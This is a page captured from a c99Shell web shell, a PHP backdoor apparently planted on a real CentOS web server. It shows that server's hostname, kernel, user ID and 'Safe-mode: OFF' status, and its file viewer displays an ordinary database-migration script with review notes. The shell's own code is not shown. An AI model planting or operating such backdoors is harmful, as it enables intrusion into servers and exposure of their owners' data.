!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/migrate/   drwxr-xr-x
Free 50.99 GB of 127.8 GB (39.9%)


Viewing file:     index.php (7.87 KB)      -rw-r--r--
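<?php
/**
 * MIS migrate helper.
 *
 * Takes MySQL connection details and two schema names from the request,
 * compares the columns of every table in $tableList between the old and the
 * new schema, and prints TRUNCATE / INSERT ... SELECT statements for the
 * operator to paste into phpMyAdmin. The script itself only issues SELECTs.
 *
 * NOTE(review): nothing in this file authenticates the caller. Anyone who can
 * reach the URL can make the web server attempt MySQL logins against any host
 * they name, so the page belongs behind access control and should be removed
 * from the document root once the migration is finished.
 * NOTE(review): input is read from $_REQUEST, so credentials are also accepted
 * from the query string (where they land in access logs) and from cookies.
 * The form below posts, so $_POST would be the narrower source.
 * NOTE(review): ext/mysql (mysql_connect and friends) no longer exists in
 * PHP 7+. Port to mysqli or PDO before moving this off PHP 5.
 */

/**
 * Escape a value for HTML text or a quoted attribute value.
 */
function migrate_html($value)
{
    // NOTE(review): no charset argument is passed because this file does not
    // declare the page encoding; add it once that is confirmed.
    return htmlspecialchars((string) $value, ENT_QUOTES);
}

/**
 * Tell whether $name is safe to use as a schema name in generated SQL.
 *
 * Only the characters MySQL allows in an unquoted identifier are accepted,
 * which is what the unquoted "db.table" output of this script needs anyway.
 */
function migrate_is_identifier($name)
{
    return is_string($name) && preg_match('/\A[0-9A-Za-z_$]+\z/', $name) === 1;
}

/**
 * Return a request field as a string, or $default when it is absent or is
 * not a plain string (e.g. an array sent as "host[]=...").
 */
function migrate_request($key, $default)
{
    if (isset($_REQUEST[$key]) && is_string($_REQUEST[$key])) {
        return $_REQUEST[$key];
    }
    return $default;
}

if (isset($_REQUEST["submit"])) {

    // One flag per form field, in form order: host, user, pass, DBOld, DBNew.
    $error = array(false, false, false, false, false);
    $requiredKeys = array("host", "user", "pass", "DBOld", "DBNew");

    foreach ($requiredKeys as $idx => $key) {
        if (empty($_REQUEST[$key]) || !is_string($_REQUEST[$key])) {
            $error[$idx] = true;
        }
    }

    // The schema names are concatenated into SQL below, so anything that is
    // not a plain identifier is rejected here rather than escaped later.
    if (!$error[3] && !migrate_is_identifier($_REQUEST["DBOld"])) {
        $error[3] = true;
    }
    if (!$error[4] && !migrate_is_identifier($_REQUEST["DBNew"])) {
        $error[4] = true;
    }

    // $pass means "validation passed"; it is not the password.
    $pass = !in_array(true, $error, true);

    if ($pass) {

        $dbOld = $_REQUEST["DBOld"];
        $dbNew = $_REQUEST["DBNew"];
        $dbOldHtml = migrate_html($dbOld);
        $dbNewHtml = migrate_html($dbNew);

        // Every list below is commented out, so without this default the
        // loop would iterate an undefined variable. Uncomment exactly one.
        $tableList = array();

        // -- Common Data Tables List. -- //
        //$tableList = array("accessories_tb", "autocar_tb", "automobile_tb", "budget_year_tb", "building_tb", "comment_tb", "committee_tb", "degree_his_tb", "degree_type_tb", "durable_tb", "edu_product_tb", "edu_project_tb", "edu_service_tb", "facultycon_tb", "faculty_tb", "finance2_tb", "finance3_tb", "finance4_tb", "finance_tb", "formaoffice", "formation_tb", "formcaroffice", "formproject", "formproject_edit_tb", "history_absent_tb", "history_accumu", "history_decoration_tb", "history_position_tb", "instructor_tb", "manament_tb", "mapcollege_tb", "money_source_tb", "personal_tb", "position_tb", "project_tb", "project_type_tb", "research_char_tb", "research_filetex_tb", "research_file_tb", "research_public_tb", "research_success_tb", "research_tb", "res_project_tb", "room_tb", "salary_repot_tb", "salary_tb", "salary_type_tb", "state_tb", "stu_notebook", "techplan_method_tb", "training_tb", "user_tb");

        // -- Migrate Incorrect Table(For Migrate Data Already) -- //
        //$tableList = array("edu_product_tb", "edu_project_tb", "edu_service_tb", "finance2_tb", "finance3_tb", "finance4_tb", "instructor_tb");

        // -- Extra Data Tables List (with qa_result_tb table)--//
        //$tableList = array("dev_coursedu", "dev_his", "dev_hreduhis", "dev_hrperson", "projectcode_tb", "projectname", "projectqa_type_tb", "projectstdplan_tb", "projectstra_type_tb", "project_mission", "project_plan", "project_plan_temp", "project_report_tb", "project_submission", "project_type_temp", "project_year", "projstrategy_tb", "proplanstrateg_tb", "prostrategymap_tb", "qa_data_tb", "qa_elements", "qa_elements_tb", "qa_indicator", "qa_indicatorpi_tb", "qa_indicator_tb", "qa_performance", "qa_pi_cri_tb", "qa_project_tb", "qa_qareport_tb", "qa_report_tb", "qa_result_indicator", "qa_result_standard", "qa_result_tb", "qa_standard_result", "qa_standard_tb", "teach_ingmethod", "teach_lessonplans", "tech_categorydetail", "tech_categoryplan", "tech_categorytopic", "tech_corseplan_tb", "tech_coseoutcom", "tech_courseteacher", "tech_imgmethod_tb", "tech_lesson_plans", "tech_methodcom_tb", "tech_outcom", "tech_outcom_tb", "tech_planmethod", "tech_plan_tb", "tech_spec_tb", "tech_text_tb");

        // -- Extra Data Tables List (without qa_result_tb table)--//
        //$tableList = array("dev_coursedu", "dev_his", "dev_hreduhis", "dev_hrperson", "projectcode_tb", "projectname", "projectqa_type_tb", "projectstdplan_tb", "projectstra_type_tb", "project_mission", "project_plan", "project_plan_temp", "project_report_tb", "project_submission", "project_type_temp", "project_year", "projstrategy_tb", "proplanstrateg_tb", "prostrategymap_tb", "qa_data_tb", "qa_elements", "qa_elements_tb", "qa_indicator", "qa_indicatorpi_tb", "qa_indicator_tb", "qa_performance", "qa_pi_cri_tb", "qa_project_tb", "qa_qareport_tb", "qa_report_tb", "qa_result_indicator", "qa_result_standard", "qa_standard_result", "qa_standard_tb", "teach_ingmethod", "teach_lessonplans", "tech_categorydetail", "tech_categoryplan", "tech_categorytopic", "tech_corseplan_tb", "tech_coseoutcom", "tech_courseteacher", "tech_imgmethod_tb", "tech_lesson_plans", "tech_methodcom_tb", "tech_outcom", "tech_outcom_tb", "tech_planmethod", "tech_plan_tb", "tech_spec_tb", "tech_text_tb");

        $conn = mysql_connect($_REQUEST["host"], $_REQUEST["user"], $_REQUEST["pass"]) or die("ไม่สามารถติดต่อฐานข้อมูลได้");

        echo "<br>--<br>";
        echo "-- Copy SQL ทั้งหมดไปวางใน phpMyAdmin<br>";
        echo "--<br><br>";

        if (count($tableList) === 0) {
            echo "-- No table list is enabled; uncomment one \$tableList assignment in this script.<br><br>";
        }

        foreach ($tableList as $tableName) {
            $tableHtml = migrate_html($tableName);

            // Schema names were validated above; backticks keep the
            // identifiers from being parsed as anything else.
            $result1 = mysql_query("SELECT * FROM `".$dbOld."`.`".$tableName."`", $conn);
            $result2 = mysql_query("SELECT * FROM `".$dbNew."`.`".$tableName."`", $conn);

            // mysql_query() returns false when the table is missing; test
            // that directly instead of passing false to mysql_num_fields().
            if ($result1 === false || $result2 === false) {
                $missingIn = ($result1 === false) ? $dbOldHtml : $dbNewHtml;
                echo "--<br>";
                echo "-- $tableHtml<br>";
                echo "--<br><br>";
                echo "-- ไม่พบ ตาราง $tableHtml ในฐานข้อมูล ".$missingIn."<br><br>";
                echo "-- --------------------------------------<br><br>";
                if ($result1 !== false) {
                    mysql_free_result($result1);
                }
                if ($result2 !== false) {
                    mysql_free_result($result2);
                }
                continue;
            }

            // Column names of the table in the old schema.
            $fieldDBOld = array();
            $oldCount = mysql_num_fields($result1);
            for ($i = 0; $i < $oldCount; ++$i) {
                $fieldDBOld[] = mysql_field_name($result1, $i);
            }

            // Column names of the table in the new schema.
            $fieldDBNew = array();
            $newCount = mysql_num_fields($result2);
            for ($i = 0; $i < $newCount; ++$i) {
                $fieldDBNew[] = mysql_field_name($result2, $i);
            }

            // Only columns present on both sides can be copied.
            $shared = array();
            foreach ($fieldDBOld as $columnName) {
                if (in_array($columnName, $fieldDBNew, true)) {
                    $shared[] = "`".str_replace("`", "``", $columnName)."`";
                }
            }
            $fieldHtml = migrate_html(implode(", ", $shared));

            echo "--<br>";
            echo "-- ตาราง : $tableHtml<br>";
            echo "--<br><br>";

            if (count($shared) === 0) {
                // An INSERT with an empty column list is invalid SQL, and a
                // TRUNCATE on its own would only destroy the new table's data.
                echo "-- No columns in common; nothing to copy for this table.<br><br>";
            } else {
                echo "TRUNCATE ".$dbNewHtml.".`$tableHtml`;<br><br>";
                echo "INSERT INTO ".$dbNewHtml.".".$tableHtml."(".$fieldHtml.") SELECT ".$fieldHtml." FROM ".$dbOldHtml.".".$tableHtml.";<br><br>";
            }

            echo "-- จำนวนแถวข้อมูล : ".mysql_num_rows($result1)." แถว<br><br>";
            echo "-- --------------------------------------<br><br>";

            mysql_free_result($result1);
            mysql_free_result($result2);
        }

    }
}
?>

<?php
// The form is shown on first load and again whenever validation failed.
if (empty($pass)) {
    $errStyle = " style=\"border-style:solid;border-width:1px;border-color:darkred;background-color:#FF3333;\"";
?>
    <table width="100%" align="center">
        <tr>
            <td>
                <FORM METHOD="POST" NAME="migrateForm" ACTION="">
                <table width="60%" align="center">
                    <tr>
                        <td colspan="2" height="50" align="center"><h3>MIS MIGRATE</h3></td>
                    </tr>
                    <tr>
                        <td width="40%" height="30" align="right">Host:</td>
                        <td width="60%" align="left"><INPUT TYPE="text" NAME="host" value="<?php echo migrate_html(migrate_request("host", "localhost")); ?>"<?php echo (isset($error) && $error[0] == true) ? $errStyle : ""; ?>></td>
                    </tr>
                    <tr>
                        <td width="40%" height="30" align="right">Username:</td>
                        <td width="60%" align="left"><INPUT TYPE="text" NAME="user" value="<?php echo migrate_html(migrate_request("user", "root")); ?>"<?php echo (isset($error) && $error[1] == true) ? $errStyle : ""; ?>></td>
                    </tr>
                    <tr>
                        <td width="40%" height="30" align="right">Password:</td>
                        <?php /* The submitted password is deliberately not written back into the page source. */ ?>
                        <td width="60%" align="left"><INPUT TYPE="password" NAME="pass" value=""<?php echo (isset($error) && $error[2] == true) ? $errStyle : ""; ?>></td>
                    </tr>
                    <tr>
                        <td width="40%" height="30" align="right">MIS DB(เก่า):</td>
                        <td width="60%" align="left"><INPUT TYPE="text" NAME="DBOld" value="<?php echo migrate_html(migrate_request("DBOld", "")); ?>"<?php echo (isset($error) && $error[3] == true) ? $errStyle : ""; ?>></td>
                    </tr><tr>
                        <td width="40%" height="30" align="right">MIS DB(ใหม่):</td>
                        <td width="60%" align="left"><INPUT TYPE="text" NAME="DBNew" value="<?php echo migrate_html(migrate_request("DBNew", "")); ?>"<?php echo (isset($error) && $error[4] == true) ? $errStyle : ""; ?>></td>
                    </tr>
                    <tr>
                        <td colspan="2" height="50" align="center"><INPUT TYPE="submit" name="submit" value="ยืนยัน" style="cursor:pointer" title="คลิ๊กที่นี่เพื่อเริ่ม Migrate ข้อมูล"></td>
                    </tr>
                </table>
                </FORM>
            </td>
        </tr>
    </table>
<?php } ?>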

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0176 ]--